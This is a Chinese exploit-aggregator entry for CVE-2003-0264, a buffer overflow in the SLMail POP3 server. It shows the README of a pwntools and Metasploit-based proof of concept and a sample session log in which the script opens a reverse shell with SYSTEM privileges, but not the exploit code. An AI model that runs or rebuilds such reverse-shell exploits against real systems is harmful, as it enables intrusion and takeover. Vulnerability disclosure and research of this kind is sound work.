POC详情: 2c3ea71d17d24b012345364badfd8383cd08ba0c

来源
关联漏洞
标题: SLMail安全漏洞 (CVE-2003-0264)
描述:SLMail 5.1.0.4420版本存在安全漏洞。远程攻击者可以通过(1)slmail.exe中的超长EHLO 参数,(2) slmail.exe中的超长XTRN参数,(3) POPPASSWD中的超长字符串,或(4)POP3服务器中的超长密码执行任意代码。
描述
Exploit for CVE-2003-0264 based on pwntools and metasploit's windows/reverse_tcp
介绍
# CVE-2003-0264

Exploit for buffer overflow in SLmail 5.5 (CVE-2003-0264)

Based on:
* https://github.com/Gallopsled/pwntools
* https://github.com/rapid7/metasploit-framework

Example output:
```
$ ./slmail-into-shell.py
[+] Opening connection to 192.168.15.100 on port 110: Done

[+] Trying to bind to 0.0.0.0 on port 4444: Done
[+] Waiting for connections on 0.0.0.0:4444: Got connection from 192.168.15.100 on port 49168
[*] Received server hello
[*] Switching to interactive mode
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\SLmail\System>$ whoami
whoami
nt authority\system
 
C:\Program Files (x86)\SLmail\System>$
[*] Closed connection to 192.168.15.100 port 49168
[*] Closed connection to 192.168.15.100 port 110
文件快照

[4.0K] /data/pocs/2c3ea71d17d24b012345364badfd8383cd08ba0c ├── [ 801] README.md └── [3.4K] slmail-into-shell.py 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。